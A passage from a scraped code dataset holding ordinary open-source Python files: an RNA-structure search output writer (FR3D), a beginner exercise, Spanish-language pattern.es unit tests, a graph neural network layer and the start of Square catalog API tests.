commas\n candidatelist += \"\"\n else:\n candidatelist += \"\"\n\n candidatelist += '\\n'\n candidatelist += '
    S.ShowDiscrepancyRes. ÅPosition %dSequenceConf. %dChi %dCrossing %d--%d%d--%d\" % (header_column,c[0]+1,c[1]+1)\n header_column += 1\n candidatelist += \"
    '+str(i+1)+'.%sNA\"+candidate[\"unitids\"][j]+\"\"+sequence+\"\"+\",\".join(interactions[(c[0],c[1],pairType)])+\"
    \\n'\n\n discrepancydata = \"var data = []\\n\"\n\n if np.size(allvsallmatrix) > 0:\n # write discrepancy data in new 2022 list format\n # first element is a reference to the div in which the heatmap should appear\n discrepancydata = 'var data = [\"#heatmap\",[\\n' # start a list, start a matrix\n\n # second element is a matrix with the numerical values of the discrepancy\n # writing both upper and lower triangles of the matrix\n s = allvsallmatrix.shape[0]\n for c in range(0,s):\n discrepancydata += '[' # start a row of the discrepancy matrix\n ife1 = candidates[c][\"unitids\"][0]\n for d in range(0,s):\n ife2 = candidates[d][\"unitids\"][0]\n discrepancydata += \"%.4f\" % allvsallmatrix[c][d] # one entry\n if d < s-1:\n discrepancydata += ',' # commas between entries in a row\n else:\n discrepancydata += '],\\n' # end a row, newline\n\n discrepancydata += '],\\n' # end the matrix, continue the list\n\n # third element is a list of labels of instances\n discrepancydata += '[' # start list of instances\n for c in range(0,s):\n ife1 = candidates[c][\"unitids\"][0]\n discrepancydata += '\"' + ife1 + '\"' # write one instance name in quotes\n if c < s-1:\n discrepancydata += \",\" # commas between instances\n else:\n discrepancydata += \"]\\n]\" # end list of instances, end list of data\n\n # get the path of the current program\n current_path,current_program = os.path.split(os.path.abspath(__file__))\n\n filename = os.path.join(current_path,'template.html')\n\n # read template.html into one string\n with open(filename, 'r') as myfile:\n template = myfile.read()\n\n # replace ###PAGETITLE### with pagetitle\n template = template.replace(\"###PAGETITLE###\",pagetitle)\n template = template.replace(\"###sequencecolumn###\",str(sequence_column))\n\n if len(candidates) == 1:\n queryNote = \"Query name: %s. Found %d candidate from %d of %d files in %0.0f seconds.\" % (Q['name'].encode('ascii','ignore'),len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n queryNote = \"Query name: %s. Found %d candidate from %d of %d files in %0.0f seconds.\" % (Q['name'],len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n else:\n queryNote = \"Query name: %s. Found %d candidates from %d of %d files in %0.0f seconds.\" % (Q['name'].encode('ascii','ignore'),len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n queryNote = \"Query name: %s. Found %d candidates from %d of %d files in %0.0f seconds.\" % (Q['name'],len(candidates),Q[\"numFilesSearched\"],len(Q[\"searchFiles\"]),Q[\"elapsedClockTime\"])\n\n if len(Q[\"errorMessage\"]) > 0:\n queryNote += \"
    \\n\"\n queryNote += \"Error Message:
    \\n\"\n for line in Q[\"errorMessage\"]:\n queryNote += line + \"
    \\n\"\n if \"moreCandidatesThanHeatMap\" in Q:\n queryNote += \" \" + Q[\"moreCandidatesThanHeatMap\"] + \"\\n\"\n else:\n queryNote += \"\\n\"\n\n template = template.replace(\"###QUERYNAME###\",str(queryNote.encode('ascii','ignore')))\n\n if SERVER:\n seeModifyQuery = 'See and modify query ' % Q[\"queryID\"]\n else:\n seeModifyQuery = ''\n\n template = template.replace(\"###SEEMODIFYQUERY###\",seeModifyQuery)\n\n csvfilename,csvlink = getCSVfilename(Q)\n\n seeCSVOutput = 'See CSV output' % csvlink\n template = template.replace(\"###seeCSVOutput###\",seeCSVOutput)\n\n description = \"
    Columns of the table show candidate number in similarity order, checkbox to display coordinates or not, structure resolution, discrepancy from query in geometric or mixed searches, units matching each position in the query, sequence of the units and backbone connectivity, glycosidic bond conformation if requested, pair and stack interactions present, base-phosphate interactions, base-ribose interactions, oxygen stacking interactions, and the number of nested AU, GC, GU Watson-Crick pairs crossed by each annotated interaction.
    \"\n\n template = template.replace(\"###DESCRIPTION###\",description)\n\n # replace ###CANDIDATELIST### with candidatelist\n template = template.replace(\"###CANDIDATELIST###\",candidatelist)\n\n template = template.replace(\"###JS1###\",JS1)\n template = template.replace(\"###JS2###\",JS2)\n template = template.replace(\"###JS3###\",JS3)\n template = template.replace(\"###JS4###\",JS4)\n\n refresh = \"\"\n if \"reloadOutputPage\" in Q and Q[\"reloadOutputPage\"]:\n refresh = '' % REFRESHTIME\n template = template.replace(\"###REFRESH###\",refresh)\n\n if np.size(allvsallmatrix) > 0:\n template = template.replace(\"###JS5###\",JS5) # include heatmap.js code\n discrepancydata = ''\n template = template.replace(\"###DISCREPANCYDATA###\",discrepancydata)\n else:\n template = template.replace(\"###DISCREPANCYDATA###\",\"\")\n template = template.replace(\"###JS5###\",\"\") # do not display a heat map\n\n outputfilename = os.path.join(OUTPUTPATH,htmlfilename+\".html\")\n\n print(\"Writing to %s\" % outputfilename)\n\n messages = \"\"\n\n messages += \"\\n
    \"\n if len(Q[\"userMessage\"]) > 0:\n messages += \"User messages:
    \\n\"\n for line in Q[\"userMessage\"]:\n messages += line + \"
    \\n\"\n else:\n messages += \"No error or warning messages.
    \\n\"\n\n template = template.replace(\"###MESSAGES###\",messages)\n\n with open(outputfilename, 'w') as myfile:\n myfile.write(template)\n\n if SERVER:\n os.system(\"rm %s.gz\" % outputfilename)\n os.system(\"gzip %s\" % outputfilename)\n\n\n\ndef writeCSVOutput(Q,candidates):\n \"\"\"Write the list of candidates in comma separated value format\n \"\"\"\n\n pairTypes = ['glycosidicBondOrientation','chiDegree','pairsStacks','BPh','BR','sO','crossingNumber']\n pairsToPrint = defaultdict(list)\n\n # record which of the many possible columns contain data\n for pairType in pairTypes:\n for candidate in candidates:\n interactions = candidate[\"interactions\"]\n for a in range(0,len(candidate['indices'])): # first position\n for b in range(0,len(candidate['indices'])): # second position\n if (a,b,pairType) in interactions:\n pairsToPrint[pairType].append((a,b))\n\n pagetitle = \"FR3D %s\" % Q['name'].encode('ascii','ignore')\n\n candidatelist = ''\n\n numPositions = Q[\"numpositions\"]\n\n # write header line\n candidatelist += \"Similarity order,\"\n if(Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\"):\n candidatelist += \"Discrepancy,\"\n candidatelist += \"Resolution,\"\n\n for j in range(0,numPositions):\n candidatelist += \"Position %d,\" % (j+1)\n candidatelist += \"Sequence,\" # list sequence of candidate\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if c[0] == c[1] and pairType == 'glycosidicBondOrientation':\n candidatelist += \"Orient \"+str(c[0]+1)+\",\"\n elif c[0] == c[1] and pairType == 'chiDegree':\n candidatelist += \"Chi \"+str(c[0]+1)+\",\"\n elif pairType == 'crossingNumber':\n candidatelist += \"Cross \"+str(c[0]+1)+\"--\"+str(c[1]+1)+\",\"\n else:\n candidatelist += str(c[0]+1)+\"--\"+str(c[1]+1)+\",\"\n\n candidatelist += \"View,Coordinates,Sequence variability\" # link to view, link for coordinates\n\n candidatelist += \"\\n\"\n\n # write one row for each candidate\n for i in range(0,len(candidates)):\n candidate = candidates[i]\n candidatelist += str(i+1)+','\n if(Q[\"type\"] == \"geometric\" or Q[\"type\"] == \"mixed\"):\n candidatelist += \"%0.4f,\" % candidate[\"discrepancy\"]\n\n PDB_id = candidate[\"unitids\"][0][0:4]\n if PDB_id in Q[\"PDB_data_file\"]:\n candidatelist += format_resolution(Q[\"PDB_data_file\"][PDB_id]) + \",\"\n else:\n candidatelist += \"NA,\"\n\n # write unit ids\n for j in range(0,numPositions):\n candidatelist += candidate[\"unitids\"][j]+\",\"\n\n # write nucleotide sequence with helpful separator symbols\n sequence = \"\"\n for j in range(0,numPositions):\n fields = candidate[\"unitids\"][j].split(\"|\")\n sequence += fields[3]\n\n if len(fields) == 9: # symmetry operator present\n symm = fields[8]\n else:\n symm = \"\"\n\n if j+1 < numPositions:\n # if same chain and same symmetry operator, if present\n cfields = candidate[\"unitids\"][j+1].split(\"|\")\n if len(cfields) == 9: # symmetry operator present\n csymm = cfields[8]\n else:\n csymm = \"\"\n\n if fields[2] == cfields[2] and symm == csymm:\n if candidate['chainindices'][j] + 1 == candidate['chainindices'][j+1]: # successive\n sequence += \"--\"\n elif candidate['chainindices'][j] + 1 < candidate['chainindices'][j+1]: # later\n sequence += \"->\"\n else:\n sequence += \"<-\"\n else:\n sequence += \"..\"\n\n candidatelist += sequence + \",\"\n\n # write interactions by group\n interactions = candidate[\"interactions\"]\n for pairType in pairTypes:\n for c in sorted(list(set(pairsToPrint[pairType]))):\n if c[0] < c[1] or (c[0] != c[1] and pairType in [\"BPh\",\"BR\",\"sO\"]) or (c[0]==c[1] and pairType in [\"glycosidicBondOrientation\",\"chiDegree\"]):\n if (c[0],c[1],pairType) in interactions and len(interactions[(c[0],c[1],pairType)]) > 0 and interactions[(c[0],c[1],pairType)][0] != \"None\":\n # multiple interactions of the same type separated by commas\n candidatelist += '\"'+\",\".join(interactions[(c[0],c[1],pairType)])+'\",'\n else:\n candidatelist += \",\"\n\n # make list of unit ids\n unit_id_list = ''\n for j in range(0,numPositions):\n unit_id_list += candidate[\"unitids\"][j]\n if j < numPositions-1:\n unit_id_list += ','\n\n # make link to view\n candidatelist += '\"http://rna.bgsu.edu/rna3dhub/display3D/unitid/' + unit_id_list + '\",'\n\n # make link to coordinates\n candidatelist += '\"http://rna.bgsu.edu/rna3dhub/rest/getCoordinates?coord=' + unit_id_list + '\",'\n\n # make link to sequence variability server\n candidatelist += '\"http://rna.bgsu.edu/correspondence/variability?id=' + unit_id_list + '&format=unique\",'\n\n candidatelist += '\\n'\n\n csvfilename,csvlink = getCSVfilename(Q)\n\n outputfilename = os.path.join(OUTPUTPATH,csvfilename)\n\n if not 'server' in Q:\n print(\"Writing to %s\" % outputfilename)\n\n with open(outputfilename, 'w') as myfile:\n myfile.write(candidatelist)\n\n \"\"\"\n # Unfortunately, this doesn't work in practice, because the downloaded file is\n # unzipped but still has the .gz extension and does not have .csv.gz extension.\n # Don't know why. If you rename it from .gz to .csv, it's fine.\n if SERVER:\n os.system(\"rm %s\" % (OUTPUTPATH+csvfilename+'.gz'))\n os.system(\"gzip %s\" % (OUTPUTPATH+csvfilename))\n \"\"\"\n\ndef writeCandidateOutput(candidates, Q, ifedata):\n queryName = Q['name']\n fileName = '../output/' + queryName.encode('ascii','ignore') + '_python_output.txt'\n file = open(fileName, 'w')\n file.write(\"Found \" + str(len(candidates)) + \" candidates\\n\")\n\n\n\n for candidate in candidates:\n dataLine = \"\"\n\n indices = \"\"\n for index in candidate['indices']:\n indices += \"%6s\" % str(index)\n\n dataLine += indices\n\n file.write(dataLine + '\\n')\n file.close()\n\n\n","repo_name":"BGSU-RNA/fr3d-python","sub_path":"fr3d/search/write_output.py","file_name":"write_output.py","file_ext":"py","file_size_in_byte":20413,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"16274162436","text":"data = dict()\ngoals = list()\nalldata = list()\nwhile True:\n\n data.clear()\n data['Name'] = str(input(\"Player's name: \"))\n while True:\n try:\n data['Matches'] = int(input(f\"How many matches has {data['Name']} played ? \"))\n except ValueError as e:\n print(\"Type only integers numbers!\")\n else:\n break\n\n goals.clear()\n for x in range(0,data['Matches']):\n goals.append(int(input(f\"How many goals has {data['Name']} scored in the match {x+1} ? \")))\n data['Goals'] = goals[:]\n data['Total'] = sum(goals)\n data['AVG'] = (sum(goals)/data['Matches'])\n alldata.append(data.copy())\n\n while True:\n answer = str(input(\"Do you want to register anyone else ? (Y) = Yes, (N) = No : \")).upper()\n if answer not in 'YN':\n print(\"Please, type only 'Y' or 'N' \")\n else:\n break\n if answer == 'N':\n break\n\nprint(\"-\"*22)\nfor x in alldata:\n for k,v in x.items():\n print(f\"{k} = {v}\")\n print()\nprint(\"-\"*22)\n\nwhile True:\n search = int(input(\"Type the player's code that you want to research: (999 ens the research) \"))\n if search == 999:\n break\n if search >= len(alldata):\n print(\"Error! That code owns to no one\")\n else:\n print(f\"Player's data: {alldata[search]['Name']}\")\n for x,y in enumerate(alldata[search]['Goals']):\n print(f\"In the match {x+1} he scored {y} goals\")\n print(\"-\"*22)\n\n print(f\"The key {k} has the value: {v}\")\nprint(\"-\"*22)\n\nplayer = str(input(\"Type the player's name that you want to research: \"))\nfor x in alldata:\n if player in x['Name']:\n for k, v in x.items():\n print(f\"{k}, {v}\")\n","repo_name":"NikiReis/PythonExercises","sub_path":"World 3/Exercise 95.py","file_name":"Exercise 95.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"34099070662","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nfrom builtins import str, bytes, dict, int\nfrom builtins import map, zip, filter\nfrom builtins import object, range\n\nimport os\nimport sys\nsys.path.insert(0, os.path.join(os.path.dirname(__file__), \"..\"))\nimport unittest\nimport subprocess\n\nfrom pattern import es\n\nfrom io import open\n\ntry:\n PATH = os.path.dirname(os.path.realpath(__file__))\nexcept:\n PATH = \"\"\n\n#---------------------------------------------------------------------------------------------------\n\n\nclass TestInflection(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_pluralize(self):\n # Assert the accuracy of the pluralization algorithm.\n from pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"n\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for sg, pl in test.items():\n pl = sorted(pl, key=len, reverse=True)[0]\n if es.pluralize(sg) == pl:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.77)\n print(\"pattern.es.pluralize()\")\n\n def test_singularize(self):\n # Assert the accuracy of the singularization algorithm.\n from pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"n\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for sg, pl in test.items():\n pl = sorted(pl, key=len, reverse=True)[0]\n if es.singularize(pl) == sg:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.93)\n print(\"pattern.es.singularize()\")\n\n def test_attributive(self):\n # Assert \"alto\" => \"altos\" (masculine, plural), and others.\n for lemma, inflected, gender in (\n (\"alto\", \"alto\", es.MALE + es.SINGULAR),\n (\"alto\", \"altos\", es.MALE + es.PLURAL),\n (\"alto\", \"alta\", es.FEMALE + es.SINGULAR),\n (\"alto\", \"altas\", es.FEMALE + es.PLURAL),\n (\"verde\", \"verdes\", es.MALE + es.PLURAL),\n (\"verde\", \"verdes\", es.FEMALE + es.PLURAL)):\n v = es.attributive(lemma, gender)\n self.assertEqual(v, inflected)\n print(\"pattern.es.attributive()\")\n\n def test_predicative(self):\n # Assert the accuracy of the predicative algorithm (\"horribles\" => \"horrible\").\n from pattern.db import Datasheet\n test = {}\n for w, lemma, tag, f in Datasheet.load(os.path.join(PATH, \"corpora\", \"wordforms-es-davies.csv\")):\n if tag == \"j\":\n test.setdefault(lemma, []).append(w)\n i, n = 0, 0\n for pred, attr in test.items():\n attr = sorted(attr, key=len, reverse=True)[0]\n if es.predicative(attr) == pred:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.92)\n print(\"pattern.es.predicative()\")\n\n def test_find_lemma(self):\n # Assert the accuracy of the verb lemmatization algorithm.\n i, n = 0, 0\n for v1, v2 in es.inflect.verbs.inflections.items():\n if es.inflect.verbs.find_lemma(v1) == v2:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.80)\n print(\"pattern.es.inflect.verbs.find_lemma()\")\n\n def test_find_lexeme(self):\n # Assert the accuracy of the verb conjugation algorithm.\n i, n = 0, 0\n for v, lexeme1 in es.inflect.verbs.infinitives.items():\n lexeme2 = es.inflect.verbs.find_lexeme(v)\n for j in range(len(lexeme2)):\n if lexeme1[j] == lexeme2[j]:\n i += 1\n n += 1\n self.assertTrue(float(i) / n > 0.85)\n print(\"pattern.es.inflect.verbs.find_lexeme()\")\n\n def test_conjugate(self):\n # Assert different tenses with different conjugations.\n for (v1, v2, tense) in (\n (\"ser\", \"ser\", es.INFINITIVE),\n (\"ser\", \"soy\", (es.PRESENT, 1, es.SINGULAR)),\n (\"ser\", \"eres\", (es.PRESENT, 2, es.SINGULAR)),\n (\"ser\", \"es\", (es.PRESENT, 3, es.SINGULAR)),\n (\"ser\", \"somos\", (es.PRESENT, 1, es.PLURAL)),\n (\"ser\", \"sois\", (es.PRESENT, 2, es.PLURAL)),\n (\"ser\", \"son\", (es.PRESENT, 3, es.PLURAL)),\n (\"ser\", \"siendo\", (es.PRESENT + es.PARTICIPLE)),\n (\"ser\", \"sido\", (es.PAST + es.PARTICIPLE)),\n (\"ser\", \"era\", (es.IMPERFECT, 1, es.SINGULAR)),\n (\"ser\", \"eras\", (es.IMPERFECT, 2, es.SINGULAR)),\n (\"ser\", \"era\", (es.IMPERFECT, 3, es.SINGULAR)),\n (\"ser\", \"éramos\", (es.IMPERFECT, 1, es.PLURAL)),\n (\"ser\", \"erais\", (es.IMPERFECT, 2, es.PLURAL)),\n (\"ser\", \"eran\", (es.IMPERFECT, 3, es.PLURAL)),\n (\"ser\", \"fui\", (es.PRETERITE, 1, es.SINGULAR)),\n (\"ser\", \"fuiste\", (es.PRETERITE, 2, es.SINGULAR)),\n (\"ser\", \"fue\", (es.PRETERITE, 3, es.SINGULAR)),\n (\"ser\", \"fuimos\", (es.PRETERITE, 1, es.PLURAL)),\n (\"ser\", \"fuisteis\", (es.PRETERITE, 2, es.PLURAL)),\n (\"ser\", \"fueron\", (es.PRETERITE, 3, es.PLURAL)),\n (\"ser\", \"sería\", (es.CONDITIONAL, 1, es.SINGULAR)),\n (\"ser\", \"serías\", (es.CONDITIONAL, 2, es.SINGULAR)),\n (\"ser\", \"sería\", (es.CONDITIONAL, 3, es.SINGULAR)),\n (\"ser\", \"seríamos\", (es.CONDITIONAL, 1, es.PLURAL)),\n (\"ser\", \"seríais\", (es.CONDITIONAL, 2, es.PLURAL)),\n (\"ser\", \"serían\", (es.CONDITIONAL, 3, es.PLURAL)),\n (\"ser\", \"seré\", (es.FUTURE, 1, es.SINGULAR)),\n (\"ser\", \"serás\", (es.FUTURE, 2, es.SINGULAR)),\n (\"ser\", \"será\", (es.FUTURE, 3, es.SINGULAR)),\n (\"ser\", \"seremos\", (es.FUTURE, 1, es.PLURAL)),\n (\"ser\", \"seréis\", (es.FUTURE, 2, es.PLURAL)),\n (\"ser\", \"serán\", (es.FUTURE, 3, es.PLURAL)),\n (\"ser\", \"sé\", (es.PRESENT, 2, es.SINGULAR, es.IMPERATIVE)),\n (\"ser\", \"sed\", (es.PRESENT, 2, es.PLURAL, es.IMPERATIVE)),\n (\"ser\", \"sea\", (es.PRESENT, 1, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"seas\", (es.PRESENT, 2, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"sea\", (es.PRESENT, 3, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"seamos\", (es.PRESENT, 1, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"seáis\", (es.PRESENT, 2, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"sean\", (es.PRESENT, 3, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"fuera\", (es.PAST, 1, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fueras\", (es.PAST, 2, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fuera\", (es.PAST, 3, es.SINGULAR, es.SUBJUNCTIVE)),\n (\"ser\", \"fuéramos\", (es.PAST, 1, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"fuerais\", (es.PAST, 2, es.PLURAL, es.SUBJUNCTIVE)),\n (\"ser\", \"fueran\", (es.PAST, 3, es.PLURAL, es.SUBJUNCTIVE))):\n self.assertEqual(es.conjugate(v1, tense), v2)\n print(\"pattern.es.conjugate()\")\n\n def test_lexeme(self):\n # Assert all inflections of \"ser\".\n v = es.lexeme(\"ser\")\n self.assertEqual(v, [\n 'ser', 'soy', 'eres', 'es', 'somos', 'sois', 'son', 'siendo',\n 'fui', 'fuiste', 'fue', 'fuimos', 'fuisteis', 'fueron', 'sido',\n 'era', 'eras', 'éramos', 'erais', 'eran',\n 'seré', 'serás', 'será', 'seremos', 'seréis', 'serán',\n 'sería', 'serías', 'seríamos', 'seríais', 'serían',\n 'sé', 'sed',\n 'sea', 'seas', 'seamos', 'seáis', 'sean',\n 'fuera', 'fueras', 'fuéramos', 'fuerais', 'fueran'\n ])\n print(\"pattern.es.inflect.lexeme()\")\n\n def test_tenses(self):\n # Assert tense recognition.\n self.assertTrue((es.PRESENT, 3, es.SG) in es.tenses(\"es\"))\n self.assertTrue(\"2sg\" in es.tenses(\"eres\"))\n # The CONDITIONAL is sometimes described as a mood,\n # and sometimes as a tense of the indicative mood (e.g., in Spanish):\n t1 = (es.CONDITIONAL, 1, es.SG)\n t2 = (es.PRESENT, 1, es.SG, es.CONDITIONAL)\n self.assertTrue(\"1sg->\" in es.tenses(\"sería\"))\n self.assertTrue(t1 in es.tenses(\"sería\"))\n self.assertTrue(t2 in es.tenses(\"sería\"))\n self.assertTrue(t1 in es.tenses(es.conjugate(\"ser\", mood=es.INDICATIVE, tense=es.CONDITIONAL)))\n self.assertTrue(t2 in es.tenses(es.conjugate(\"ser\", mood=es.CONDITIONAL)))\n print(\"pattern.es.tenses()\")\n\n#---------------------------------------------------------------------------------------------------\n\n\nclass TestParser(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def test_find_lemmata(self):\n # Assert lemmata for nouns, adjectives, verbs and determiners.\n v = es.parser.find_lemmata([\n [\"Los\", \"DT\"], [\"gatos\", \"NNS\"], [\"negros\", \"JJ\"], [\"se\", \"PRP\"], [\"sentó\", \"VB\"],\n [\"en\", \"IN\"], [\"la\", \"DT\"], [\"alfombra\", \"NN\"]])\n self.assertEqual(v, [\n [\"Los\", \"DT\", \"el\"],\n [\"gatos\", \"NNS\", \"gato\"],\n [\"negros\", \"JJ\", \"negro\"],\n [\"se\", \"PRP\", \"se\"],\n [\"sentó\", \"VB\", \"sentar\"],\n [\"en\", \"IN\", \"en\"],\n [\"la\", \"DT\", \"el\"],\n [\"alfombra\", \"NN\", \"alfombra\"]])\n print(\"pattern.es.parser.find_lemmata()\")\n\n def test_parse(self):\n # Assert parsed output with Penn Treebank II tags (slash-formatted).\n # \"el gato negro\" is a noun phrase, \"en la alfombra\" is a prepositional noun phrase.\n v = es.parser.parse(\"El gato negro se sentó en la alfombra.\")\n self.assertEqual(v, # XXX - shouldn't \"se\" be part of the verb phrase?\n \"El/DT/B-NP/O gato/NN/I-NP/O negro/JJ/I-NP/O \" + \\\n \"se/PRP/B-NP/O sentó/VB/B-VP/O \" + \\\n \"en/IN/B-PP/B-PNP la/DT/B-NP/I-PNP alfombra/NN/I-NP/I-PNP ././O/O\"\n )\n # Assert the accuracy of the Spanish tagger.\n i, n = 0, 0\n for sentence in open(os.path.join(PATH, \"corpora\", \"tagged-es-wikicorpus.txt\")).readlines():\n sentence = sentence.strip()\n s1 = [w.split(\"/\") for w in sentence.split(\" \")]\n s2 = [[w for w, pos in s1]]\n s2 = es.parse(s2, tokenize=False, tagset=es.PAROLE)\n s2 = [w.split(\"/\") for w in s2.split(\" \")]\n for j in range(len(s1)):\n if s1[j][1] == s2[j][1]:\n i += 1\n n += 1\n #print(float(i) / n)\n self.assertTrue(float(i) / n > 0.92)\n print(\"pattern.es.parser.parse()\")\n\n def test_tag(self):\n # Assert [(\"el\", \"DT\"), (\"gato\", \"NN\"), (\"negro\", \"JJ\")].\n v = es.tag(\"el gato negro\")\n self.assertEqual(v, [(\"el\", \"DT\"), (\"gato\", \"NN\"), (\"negro\", \"JJ\")])\n print(\"pattern.es.tag()\")\n\n def test_command_line(self):\n # Assert parsed output from the command-line (example from the documentation).\n p = [\"python\", \"-m\", \"pattern.es\", \"-s\", \"El gato negro.\", \"-OTCRL\"]\n p = subprocess.Popen(p, stdout=subprocess.PIPE)\n p.wait()\n v = p.stdout.read().decode('utf-8')\n v = v.strip()\n self.assertEqual(v, \"El/DT/B-NP/O/O/el gato/NN/I-NP/O/O/gato negro/JJ/I-NP/O/O/negro ././O/O/O/.\")\n print(\"python -m pattern.es\")\n\n#---------------------------------------------------------------------------------------------------\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestInflection))\n suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestParser))\n return suite\n\nif __name__ == \"__main__\":\n\n result = unittest.TextTestRunner(verbosity=1).run(suite())\n sys.exit(not result.wasSuccessful())\n","repo_name":"clips/pattern","sub_path":"test/test_es.py","file_name":"test_es.py","file_ext":"py","file_size_in_byte":12071,"program_lang":"python","lang":"en","doc_type":"code","stars":8585,"dataset":"github-code","pt":"52"} +{"seq_id":"34809446038","text":"import torch.nn as nn\r\nfrom torch.nn import Module, Parameter\r\n\r\n\r\nclass TrainableSGConv(Module):\r\n def __init__(self,\r\n in_features,\r\n out_features,\r\n bias=False,\r\n K=2,\r\n cached=True,\r\n **kwargs):\r\n\r\n super().__init__()\r\n self.K = K\r\n self.w = nn.Linear(in_features, out_features, bias=bias)\r\n self.cache = None\r\n self.cached = cached\r\n\r\n def forward(self, x, adj):\r\n\r\n if self.cache is None or not self.cached:\r\n for _ in range(self.K):\r\n x = adj.mm(x)\r\n self.cache = x\r\n else:\r\n x = self.cache\r\n\r\n return self.w(x)\r\n\r\n def reset_parameters(self):\r\n self.w.reset_parameters()\r\n\r\n def __repr__(self):\r\n return f\"{self.__class__.__name__}({self.in_features}, {self.out_features}, K={self.K})\"\r\n","repo_name":"EdisonLeeeee/GraphGallery","sub_path":"graphgallery/nn/layers/pytorch/conv/trainable_sgc.py","file_name":"trainable_sgc.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":450,"dataset":"github-code","pt":"52"} +{"seq_id":"39945855597","text":"from __future__ import absolute_import\n\nimport unittest\nimport uuid\n\nimport squareconnect\nfrom squareconnect.apis.catalog_api import CatalogApi\nfrom squareconnect.models import BatchDeleteCatalogObjectsRequest\nfrom squareconnect.models import BatchRetrieveCatalogObjectsRequest\nfrom squareconnect.models import BatchUpsertCatalogObjectsRequest\nfrom squareconnect.models import CatalogCategory\nfrom squareconnect.models import CatalogDiscount\nfrom squareconnect.models import CatalogItem\nfrom squareconnect.models import CatalogItemModifierListInfo\nfrom squareconnect.models import CatalogItemVariation\nfrom squareconnect.models import CatalogModifier\nfrom squareconnect.models import CatalogModifierList\nfrom squareconnect.models import CatalogObject\nfrom squareconnect.models import CatalogObjectBatch\nfrom squareconnect.models import CatalogQuery\nfrom squareconnect.models import CatalogQueryItemsForTax\nfrom squareconnect.models import CatalogQueryPrefix\nfrom squareconnect.models import CatalogTax\nfrom squareconnect.models import Money\nfrom squareconnect.models import SearchCatalogObjectsRequest\nfrom squareconnect.models import UpdateItemModifierListsRequest\nfrom squareconnect.models import UpdateItemTaxesRequest\nfrom squareconnect.models import UpsertCatalogObjectRequest\nfrom .utils import APITestCase\n\n\nclass TestCatalogApi(APITestCase):\n CLIENT_ID_BEVERAGES = '#Beverages'\n CLIENT_ID_CHOCOLATE = '#Chocolate'\n CLIENT_ID_COFFEE = '#Coffee'\n CLIENT_ID_COFFEE_LARGE = '#LargeCoffee'\n CLIENT_ID_COFFEE_SMALL = '#SmallCoffee'\n CLIENT_ID_DISCOUNT = '#Discount'\n CLIENT_ID_HAZELNUT = '#Hazelnut'\n CLIENT_ID_MILK_SKIM = '#SkimMilk'\n CLIENT_ID_MILK_SOY = '#SoyMilk'\n CLIENT_ID_MILK_WHOLE = '#WholeMilk'\n CLIENT_ID_MILKS = '#Milks'\n CLIENT_ID_SALES_TAX = '#SalesTax'\n CLIENT_ID_SYRUPS = '#Syrups'\n CLIENT_ID_TEA = '#Tea'\n CLIENT_ID_TEA_LARGE = '#LargeTea'\n CLIENT_ID_TEA_SMALL = '#SmallTea'\n CLIENT_ID_VANILLA = '#Vanilla'\n\n objects_by_client_id = dict()\n test_objects = []\n\n def build_beverages(self):\n cat = CatalogCategory()\n cat.name = 'Beverages'\n co = CatalogObject()\n co.type = 'CATEGORY'\n co.id = self.CLIENT_ID_BEVERAGES\n co.category_data = cat\n return co\n\n def build_milks(self):\n whmm = CatalogModifier()\n whmm.name = 'Whole Milk'\n whm = CatalogObject()\n whm.type = 'MODIFIER'\n whm.id = self.CLIENT_ID_MILK_WHOLE\n whm.modifier_data = whmm\n\n skmm = CatalogModifier()\n skmm.name = 'Skim Milk'\n skm = CatalogObject()\n skm.type = 'MODIFIER'\n skm.id = self.CLIENT_ID_MILK_SKIM\n skm.modifier_data = skmm\n\n symm = CatalogModifier()\n symm.name = 'Soy Milk'\n symm.price_money = Money(50, 'USD')\n sym = CatalogObject()\n sym.type = 'MODIFIER'\n sym.id = self.CLIENT_ID_MILK_SOY\n sym.modifier_data = symm\n\n ml = CatalogModifierList()\n ml.name = 'Milks'\n ml.modifiers = [whm, skm, sym]\n\n co = CatalogObject()\n co.type = 'MODIFIER_LIST'\n co.id = self.CLIENT_ID_MILKS\n 